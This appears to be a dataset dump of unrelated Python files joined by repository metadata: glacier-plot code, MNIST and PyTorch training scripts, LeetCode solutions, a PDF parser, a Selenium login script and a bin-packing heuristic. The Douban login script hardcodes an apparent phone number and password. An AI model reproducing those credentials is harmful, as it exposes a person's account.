ax.text(1350,48,'$s_{5}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:brown')
# ax.text(1000,22,'Fully correlated = Systematic',bbox= dict(boxstyle='round', facecolor='white', alpha=0.5),color='dimgrey')
# plt.xscale('log')
ax.legend(loc='upper left',bbox_to_anchor=(0, 0, 1, 0.925),title='Spatial correlations of\nGP elevation with\ntime lag to observation',title_fontsize=6,ncol=2,columnspacing=0.5)
ax.text(0.025, 0.975, 'b', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.text(740,45,'panel (a)',fontweight='bold',va='bottom',ha='left')
# plt.savefig('/home/atom/ongoing/work_worldwide/figures/Figure_S12.png',dpi=360)
ax.tick_params(width=0.35,length=2.5)
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from pybob.ddem_tools import nmad
df_gp = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')
df_hr = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.category.values=='matthias')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.area.values<1000000.)
ind = df_hr.perc_meas>0.70
list_rgiid = list(df_hr[ind].rgiid)
list_area = list(df_hr[df_hr.rgiid.isin(list_rgiid)].area)
list_rgiid = [rgiid for _, rgiid in sorted(zip(list_area,list_rgiid),reverse=True)]
list_area = sorted(list_area,reverse=True)
ax = fig.add_subplot(grid[:2, 7:])
kval = 3.5
# sites=np.unique(data['Site'])
# colors=['b','g','r','c','m','y','k','grey']
colors = ['tab:blue','tab:orange','tab:red','tab:grey']
# sites=sites.tolist()
ax.plot([-3, 0.5], [-3, 0.5], color='k', linestyle='-', linewidth=0.75)
label_list=[]
diff2 = []
list_area2 = []
for rgiid in list_rgiid:
df_gp_rgiid = df_gp[df_gp.rgiid==rgiid]
df_hr_rgiid = df_hr[df_hr.rgiid==rgiid]
if df_hr_rgiid.category.values[0]=='matthias':
col = colors[0]
elif df_hr_rgiid.category.values[0]=='brian':
col = colors[1]
else:
if df_hr_rgiid.site.values[0] in ['Chhota','Gangotri','Abramov','Mera']:
col = colors[2]
elif df_hr_rgiid.site.values[0] == 'Yukon':
col=colors[3]
elif df_hr_rgiid.site.values[0] == 'MontBlanc':
col=colors[0]
ax.errorbar(df_hr_rgiid.dhdt.values[0], df_gp_rgiid.dhdt.values[0],
xerr=df_hr_rgiid.err_dhdt.values[0],
yerr=df_gp_rgiid.err_dhdt.values[0],marker='o',mec='k',
ms=kval*(df_hr_rgiid.area.values[0]/1000000)**0.5/3, mew=0.25,elinewidth=0.25,ecolor=col,mfc=col,alpha=0.9)
#,ecolor=colors[sites.index(data['Site'][value])]mfc=colors[sites.index(data['Site'][value])],alpha=0.5)
diff2.append(df_hr_rgiid.dhdt.values[0]-df_gp_rgiid.dhdt.values[0])
list_area2.append(df_hr_rgiid.area.values[0])
ax.text(-1.5,0,'Mean bias:\n'+str(np.round(np.nanmean(diff2),2))+'$\pm$'+str(np.round(2*nmad(diff2)/np.sqrt(len(diff2)),2))+' m yr$^{-1}$',ha='center',va='center',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
print(np.nanmean(diff2))
print(np.nansum(np.array(diff2)*np.array(list_area2))/np.nansum(np.array(list_area2)))
ax.set_ylabel('Specific volume change (m yr$^{-1}$)')
ax.set_xlabel('High-resolution specific volume change (m yr$^{-1}$)')
#plt.legend(loc='upper left')
ax.set_xlim([-2.65, 0.5])
ax.set_ylim([-2.65, 0.5])
#mask = ~np.isnan(b_dot_anomaly) & ~np.isnan(dP)
# slope, intercept, r_value, p_value, std_err = stats.linregress(data['MB GEOD'], data['MB ASTER'])
# print(slope)
# print("r-squared:", r_value**2)
# print('std err:', std_err)
# plt.text(-320, -1250, 'Slope:' + str(np.round(slope, 2)))
# plt.text(-320, -1300, 'r$^{2}$:' + str(np.round(r_value**2, 2)))
## add symbols to show relative size of glaciers
ax.errorbar(-2150/1000,-150/1000,ms = kval*(5.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k',marker='o')
ax.errorbar(-2150/1000,-500/1000,ms = kval*(50.0**0.5)/3, xerr=0.0001, yerr=0.0001,color='k',marker='o')
ax.errorbar(-2150/1000,-1250/1000,ms = kval*(500.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k', marker='o')
ax.text(-2150/1000, -220/1000,'5 km$^2$',va='top',ha='center')
ax.text(-2150/1000, -650/1000,'50 km$^2$',va='top',ha='center')
ax.text(-2150/1000, -1730/1000,'500 km$^2$',va='top',ha='center')
ax.text(0.025,0.966,'c',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.plot([],[],color=colors[0],label='Alps',lw=1)
ax.plot([],[],color=colors[1],label='Western North America',lw=1)
ax.plot([],[],color=colors[2],label='High Mountain Asia',lw=1)
ax.plot([],[],color=colors[3],label='Alaska',lw=1)
ax.plot([],[],color='k',label='1:1 line',lw=0.5)
ax.legend(loc='lower right',title='Validation of volume changes\nwith high-resolution DEMs',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:, 7:])
ax.text(0.025,0.966,'e',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_err_dhdt=[0.1,0.2,0.4,0.6,0.8,1,1.5,2]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_err_dhdt)-1):
ind = np.logical_and(df_gp.err_dhdt < vec_err_dhdt[i+1],df_gp.err_dhdt>=vec_err_dhdt[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
err_dhdt.append(err)
diff_dhdt.append(diff)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_err_dhdt[i+1],vec_err_dhdt[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i < 2:
va_text = 'bottom'
y_off = 0.1
if i == 0:
x_off = -0.05
else:
x_off = 0
else:
va_text = 'top'
y_off = -0.1
ax.text(bin_err[i]+x_off, list_err_emp[i] + y_off, str(nb_gla[i]) + ' gla.\n' + str(np.round(nb_95ci[i] * 100, 0)) + '%',
va=va_text, ha='center')
ax.plot([0,2],[0,2],color='k',label='1:1 line',lw=0.5)
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Error (1$\sigma$) comparison to HR elevation differences\n(printed: glacier number and $\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xlabel('Theoretical specific volume change error (m yr$^{-1}$)')
ax.set_ylabel('Empirical specific volume\nchange error (m yr$^{-1}$)')
ax.set_ylim((0,1.4))
ax.legend(loc='upper right',title='Validation of volume change errors\nwith varying error size',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[2:4, 7:])
ax.text(0.025,0.966,'d',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_area=[0.01,0.05,0.2,1,5,20,200,1500]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_area)-1):
ind = np.logical_and(df_gp.area.values/1000000 < vec_area[i+1],df_gp.area.values/1000000>=vec_area[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
diff_dhdt.append(diff)
err_dhdt.append(err)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_area[i+1],vec_area[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i <2:
va_text = 'top'
y_off = -0.1
else:
va_text = 'bottom'
y_off = 0.1
ax.text(bin_err[i],list_err_emp[i]+y_off,str(nb_gla[i])+' gla.\n'+str(np.round(nb_95ci[i]*100,0))+'%',va=va_text,ha='center')
ax.plot(bin_err,list_err_the,color='black',label='Theoretical error (1$\sigma$):\nspatially integrated variograms',marker='x')
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Empirical error (1$\sigma$):\ncomparison to HR elevation differences\n(printed: glacier number and\n$\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xscale('log')
ax.set_xlabel('Area (km$^{2}$)')
ax.set_ylabel('Specific volume\nchange error (m yr$^{-1}$)')
ax.set_ylim([0,1.4])
ax.legend(loc='upper right',title='Validation of volume change errors\nwith varying glaciers area',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
plt.savefig('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',dpi=500)
| [
"[email protected]"
] | |
b6ad7644f23266306c4ba451f1ea9f54c617960f | b480e96001e478c26f8d986d3a8889d46e7c2ff2 | /test_twitter_data.py | 985e9f42afa9765a6338c7c158d33bc786e6b73b | [] | no_license | pranshulgupta7/opinion-mining | c084b7fec726e04a83b0fdae953b8df3976a0549 | 25585d78b8918f7da1be803835d9a8b66c2c2ecb | refs/heads/master | 2020-06-17T21:16:54.569052 | 2019-07-09T18:22:16 | 2019-07-09T18:22:16 | 196,057,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | #!/usr/bin/env python
import get_twitter_data
## PLACE CREDENTIALS in config.json file or run this file with appropriate arguments from command line
keyword = 'iphone'
time = 'today'
twitterData = get_twitter_data.TwitterData()
tweets = twitterData.getTwitterData(keyword, time)
print tweets
| [
"[email protected]"
] | |
b0def42355d753d0f2d67ed743d9fe7df66c8387 | e9fbeceb79f45d1fc67d41d2fcb38779275dac80 | /NN.py | 6bb3aa830382a34a654c0c355d8af280fcc7b9b4 | [] | no_license | Aqw12345/test | 51dd1c202937e5446b92c06c68c6bf30021bbe19 | 191cdb9cd461566acd79107870fada174bf0bfb4 | refs/heads/master | 2020-03-25T09:57:18.737622 | 2018-08-06T05:54:59 | 2018-08-06T05:54:59 | 143,680,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,337 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 15:13:44 2018
@author: dk
"""
#sample neuron network (无激活函数)
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
#from mnist import read_data_sets
import numpy as np
import pylab
import matplotlib.pyplot as plt
mnist=input_data.read_data_sets(u"g:/mnist/MNIST_data/",one_hot=True)
#parameters
learning_rate=0.1
num_steps=500
batch_size=128
display_step=100
#Network paraments-1st,2st layer number of neurons
n_hidden_1=256
n_hidden_2=256
num_input=784 #mnist 28*28 feature
num_classes=10 #output labels(0-9)
x=tf.placeholder(tf.float32,[None,num_input])
y=tf.placeholder(tf.float32,[None,num_classes])
#weight and bias
weight={'h1':tf.Variable(tf.random_normal([num_input,n_hidden_1])),\
'h2':tf.Variable(tf.random_normal([n_hidden_1,n_hidden_2])),\
'out':tf.Variable(tf.random_normal([n_hidden_2,num_classes]))}
biases={'b1':tf.Variable(tf.random_normal([n_hidden_1])),\
'b2':tf.Variable(tf.random_normal([n_hidden_2])),\
'out':tf.Variable(tf.random_normal([num_classes]))}
#create model
def neuron_net(x):
#Hidden1 fully connected layer with 256 neurons
layer_1=tf.add(tf.matmul(x,weight['h1']),biases['b1'])
#Hidden2 fully connected layer with 256 neurons
layer_2=tf.add(tf.matmul(layer_1,weight['h2']),biases['b2'])
# Output fully connected layer with a neuron for each class
out_layer=tf.add(tf.matmul(layer_2,weight['out']),biases['out'])
return out_layer
#Construct model
logits=neuron_net(x)
prediction=tf.nn.softmax(logits)
#loss function and optimizer
loss_op=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=y))
optimizer=tf.train.AdamOptimizer(learning_rate).minimize(loss_op)
#Evaluate model
correct_pred=tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.cast(correct_pred,tf.float32))
init=tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(1,num_steps+1):
batch_x,batch_y=mnist.train.next_batch(batch_size)
sess.run(optimizer,feed_dict={x:batch_x,y:batch_y})
if (step%display_step==0)or(step==1):
loss,acc=sess.run([loss_op,accuracy],feed_dict={x:batch_x,y:batch_y})
print("Step:"+ str(step)+",loss="+"{:.4f}".format(loss)+",training accuracy="+"{:.3f}".format(acc))
print("Optimization Finished!")
print("Testing Accuracy:",sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels}))
#可视化
for i in range(0, len(mnist.test.images)):
result = sess.run(correct_pred, feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])})
if not result:
print('预测的值是:',sess.run(prediction, feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])}))
print('实际的值是:',sess.run(y,feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])}))
one_pic_arr = np.reshape(mnist.test.images[i], (28, 28))
pic_matrix = np.matrix(one_pic_arr, dtype="float")
plt.imshow(pic_matrix)
pylab.show()
break
print(sess.run(accuracy, feed_dict={x: mnist.test.images,y: mnist.test.labels})) | [
"[email protected]"
] | |
3451487c8e6500248f939fb75c0b0f04cfaed4d1 | 2b5287769a1b6fa3db8ef87da696b1d437209731 | /RottenOranges.py | 246cba2cd7403a2b63292dd7c7faac9a4cf89b7c | [] | no_license | 08vishal/BFS-2 | 8176bd7b72f4a04b53d15d52ac85a7a91f8a8b32 | c61063ec7e2d720c7431355bf23e8a4eb31de061 | refs/heads/master | 2020-09-05T12:15:03.211279 | 2019-11-08T02:23:25 | 2019-11-08T02:23:25 | 220,101,391 | 0 | 0 | null | 2019-11-06T22:21:41 | 2019-11-06T22:21:40 | null | UTF-8 | Python | false | false | 1,186 | py | #Time Complexity:O(n2)
#space Complexity:O(1)
#LeetCode Submission:successful
#We use Bfs to find the Rotten oranges and add it to queue and do bfs till there is a element in q
class Solution(object):
def orangesRotting(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
fresh=0
m=len(grid)
n=len(grid[0])
q=[]
for i in range(m):
for j in range(n):
if grid[i][j]==2:
q.append([i,j])
if grid[i][j]==1:
fresh=fresh+1
if fresh==0:
return 0
dirs=[[0,1],[0,-1],[1,0],[-1,0]]
count=0
while(len(q) > 0):
size=len(q)
for i in range(size):
rotten=q.pop(0)
for d in dirs:
a=rotten[0]+d[0]
b=rotten[1]+d[1]
if a>=0 and a<m and b>=0 and b<n and grid[a][b]==1:
q.append([a,b])
grid[a][b]=2
fresh=fresh-1
count=count+1
if fresh !=0:
return -1
return count-1 | [
"[email protected]"
] | |
c000dff53ade0ae89692006e604a19094da2e011 | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/2529. Maximum Count of Positive Integer and Negative Integer/2529.py | c3a5e86c5fafa57b99f04a0501dc11152a560285 | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 404 | py | # https://helloacm.com/teaching-kids-programming-maximum-count-of-positive-integer-and-negative-integer-in-sorted-array/
# https://leetcode.com/problems/maximum-count-of-positive-integer-and-negative-integer/
# EASY, BINARY SEARCH
class Solution:
def maximumCount(self, nums: List[int]) -> int:
n = bisect_left(nums, 0)
p = len(nums) - bisect_right(nums, 0)
return max(p, n)
| [
"[email protected]"
] | |
9ed561bf9d023279c996061a5782fcd75045b385 | c230be483822fe044e01c924b13aaab1b635d1a1 | /Grupo 02/value_finder.py | 1951d208b13cc403d0553a58d6e435246e207a76 | [] | no_license | justicafederalRN/hackathonjfrn | 06967e6a935d93c92a82f66614c5ca56b4c5c1a3 | e69a6892f63e42bf2985fc90df26511a65006660 | refs/heads/master | 2020-03-10T14:27:04.767284 | 2018-04-18T18:04:22 | 2018-04-18T18:04:22 | 129,426,629 | 0 | 13 | null | 2018-04-18T18:04:23 | 2018-04-13T16:17:49 | JavaScript | UTF-8 | Python | false | false | 982 | py | # coding: utf-8
# (C) Júlio Barreto
# Extract data from sentences pdfs
from tika import parser
import ujson, re, os
def values(filename):
pdf_ = parser.from_file(filename)
pdf = pdf_['content'].split('\n')
pdf = pdf[32:-4]
dic = {}
dic['processo'] = re.findall("PROCESSO Nº: (.*?) - ", pdf[0])[0]
with open("texts/" + dic['processo'] + '.txt','w') as res:
res.write(pdf_['content'])
dic['valores'] = []
for i in pdf:
try:
index = i.index("R$")
except ValueError:
index = -1
if index != -1:
s = ""
mark = 0
boolean = False
while mark < 2 and len(i) > index:
if boolean:
mark += 1
if i[index] == ",":
boolean = True
if i[index] != " ":
s += i[index]
index += 1
dic['valores'].append(s)
return dic
for filename in os.listdir(os.getcwd()):
if (filename.endswith('.pdf')):
print(filename)
dic = values(filename)
with open("jsons/" + dic['processo'] + '.json','w') as res:
ujson.dump(dic, res)
| [
"[email protected]"
] | |
e0bfba5a9182ac893ec61ec8f57536236925294b | ad2090cc9591d38456621951d4901276481b55fd | /爬虫/爬虫代码/13.login_douban.py | 93cba307c7d4d4eb5184e40d309878777358bdec | [] | no_license | GuangGuangLi-Artist/LearningPython | 9d17366c4b64f5b3d53b885b71f1cf9bd4d2f53f | 0810ff6d0cc557f4d5ed8c024ce413a93183a6da | refs/heads/master | 2023-08-18T16:32:03.595418 | 2023-07-30T09:47:48 | 2023-07-30T09:47:48 | 201,511,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,866 | py | #coding=utf-8
from selenium import webdriver
import time
class DouBan():
def __init__(self):
self.driver = webdriver.Chrome()
def get_cook(self):
'''获取cookies'''
cookies = {i["name"]:i["value"] for i in self.driver.get_cookies()}
return cookies
def run(self):
self.driver.get("https://www.douban.com/")
time.sleep(3)
self.driver.switch_to.frame(self.driver.find_element_by_tag_name('iframe'))
self.driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
time.sleep(3)
self.driver.find_element_by_id("username").send_keys("15193252279")
self.driver.find_element_by_id("password").send_keys("930819@lg")
self.driver.find_element_by_class_name("account-form-field-submit").click()
time.sleep(10)
#获取cook
print(self.get_cook())
time.sleep(5)
self.driver.close()
#
# def main():
#
# options = webdriver.ChromeOptions()
# options.add_argument(
# 'user-agent=" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"')
# driver = webdriver.Chrome(chrome_options=options)
# driver.get("https://www.douban.com/")
#
# # 切换到子框架
# driver.switch_to.frame(driver.find_element_by_tag_name('iframe'))
# # 先点击账号密码登录的按钮
# driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
# time.sleep(3)
# driver.find_element_by_id("username").send_keys("15193252279")
# driver.find_element_by_id("password").send_keys("930819@lg")
#
# time.sleep(3)
#
# driver.find_element_by_class_name('account-form-field-submit ').click()
#
# time.sleep(12)
# driver.close()
if __name__ == '__main__':
db = DouBan()
db.run() | [
"[email protected]"
] | |
c7150ae1c5619678c686491e1e17d58ea079b228 | fb9be02fe82e35ab44c4caa3c7a468cb34aecc39 | /python/pytorch/train.py | 54dcefaf605f33d3fbd3740e70d092523971c044 | [] | no_license | hitaitengteng/mlflow-examples | 4e70053c7adf154139dfa3f7d7cae214bb841709 | e7f840a012c019c65a688e4ba69fbb949371f3e1 | refs/heads/master | 2022-11-26T15:42:40.837083 | 2020-07-24T07:07:29 | 2020-07-24T07:07:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,273 | py |
# Partial Model example modified from Sung Kim
# https://github.com/hunkim/PyTorchZeroToAll
import torch
import mlflow
import mlflow.pytorch
print("Torch Version:", torch.__version__)
print("MLflow Version:", mlflow.__version__)
print("Tracking URI:", mlflow.tracking.get_tracking_uri())
x_data = torch.Tensor([[1.0], [2.0], [3.0]])
y_data = torch.Tensor([[2.0], [4.0], [6.0]])
test_data = [4.0, 5.0, 6.0]
class Model(torch.nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = torch.nn.Linear(1, 1)
def forward(self, x):
y_pred = self.linear(x)
return y_pred
def run(epochs, log_as_onnx):
model = Model()
print("model.type:",type(model))
criterion = torch.nn.MSELoss(size_average=False)
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
print("Train:")
for epoch in range(epochs):
y_pred = model(x_data)
loss = criterion(y_pred, y_data)
print(f" Epoch: {epoch} Loss: {loss.data.item()}")
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("Predictions:")
for v in test_data:
tv = torch.Tensor([[v]])
y_pred = model(tv)
print(f" {v}: {model(tv).data[0][0]}")
with mlflow.start_run() as run:
print("run_id:",run.info.run_id)
mlflow.log_param("epochs", epochs)
mlflow.pytorch.log_model(model, "pytorch-model")
if args.log_as_onnx:
import onnx_utils
import onnx
print("ONNX Version:", onnx.__version__)
onnx_utils.log_model(model, "onnx-model", x_data)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--experiment_name", dest="experiment_name", help="experiment_name", default="mnist_keras")
parser.add_argument("--epochs", dest="epochs", help="epochs", default=2, type=int)
parser.add_argument("--log_as_onnx", dest="log_as_onnx", help="Log model as ONNX", default=False, action='store_true')
args = parser.parse_args()
print("Arguments:")
for arg in vars(args):
print(f" {arg}: {getattr(args, arg)}")
mlflow.set_experiment(args.experiment_name)
run(args.epochs, args.log_as_onnx)
| [
"[email protected]"
] | |
941d619540539bea7757589b89a87b799856e25f | bab119aa43329369f3fed17bd7fd6eb15f58c075 | /Final Project/Codes/heuristic.py | 2d7cfb327b63818a177cd812b66df3163b2f4f0b | [
"MIT"
] | permissive | AliRafieePour/MSCI-703-Applied-Optimization | 74766cede30ce2f4a2ba9ffe3024cacba20379fb | d5594e936debc518806e6bbbb07a5421cbb5a41a | refs/heads/main | 2023-05-14T16:40:28.009016 | 2021-06-01T22:11:50 | 2021-06-01T22:11:50 | 372,961,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,892 | py | from pyomo.environ import *
import random
import numpy as np
import logging
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from yellowbrick.cluster import KElbowVisualizer
logging.getLogger('pyomo.core').setLevel(logging.ERROR)
NUM_ITEMS = 10
i = [ii for ii in range(NUM_ITEMS)]
j = [jj for jj in range(NUM_ITEMS)]
s = ['x', 'y', 'z']
np.random.seed(50546)
def generateItems():
items = {i: {'x':np.random.randint(20, 60), 'y':np.random.randint(20, 60), 'z':np.random.randint(20, 60)} for i in range(NUM_ITEMS)}
items2 = []
for k in range(NUM_ITEMS):
items2.append([items[k]['x'], items[k]['y'], items[k]['z']])
return items, items2
lis, lis2 = generateItems()
Ls = {'x':59, 'y':59, 'z':200}
Ls2 = {0:59, 1:59, 2:200}
cis = [[0,0,0] for bb in range(NUM_ITEMS)]
def neighbour(cis, lis):
flag = 0
while(1):
randS = random.choice([0,1,2])
itemtoChnage = np.random.randint(0, len(lis))
if randS == 0:
randUni = np.random.randint(0, Ls2[randS])
if randUni+lis[itemtoChnage]['x']<= Ls2[randS]:
cis[itemtoChnage][randS] = randUni
break
elif randS == 1:
randUni = np.random.randint(0, Ls2[randS])
if randUni+lis[itemtoChnage]['y']<= Ls2[randS]:
cis[itemtoChnage][randS] = randUni
break
elif randS == 2:
ss = 0
for item in range(len(lis)):
ss += lis[item]['z']
#print(ss)
randUni = np.random.randint(0, 1.25*ss)
if randUni+lis[itemtoChnage]['z']<= ss:
cis[itemtoChnage][randS] = randUni
break
return cis
def evaluate(cis,lis):
summ = 0
# for item in range(len(lis)):
# summ +=cis[item][2]+lis[item]['z']
for item in range(len(lis)):
for item2 in range(item+1, len(lis)):
if (cis[item2][0] <= lis[item]['x']+cis[item][0] <= lis[item2]['x']+cis[item2][0] and cis[item][0]>=cis[item2][0]):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
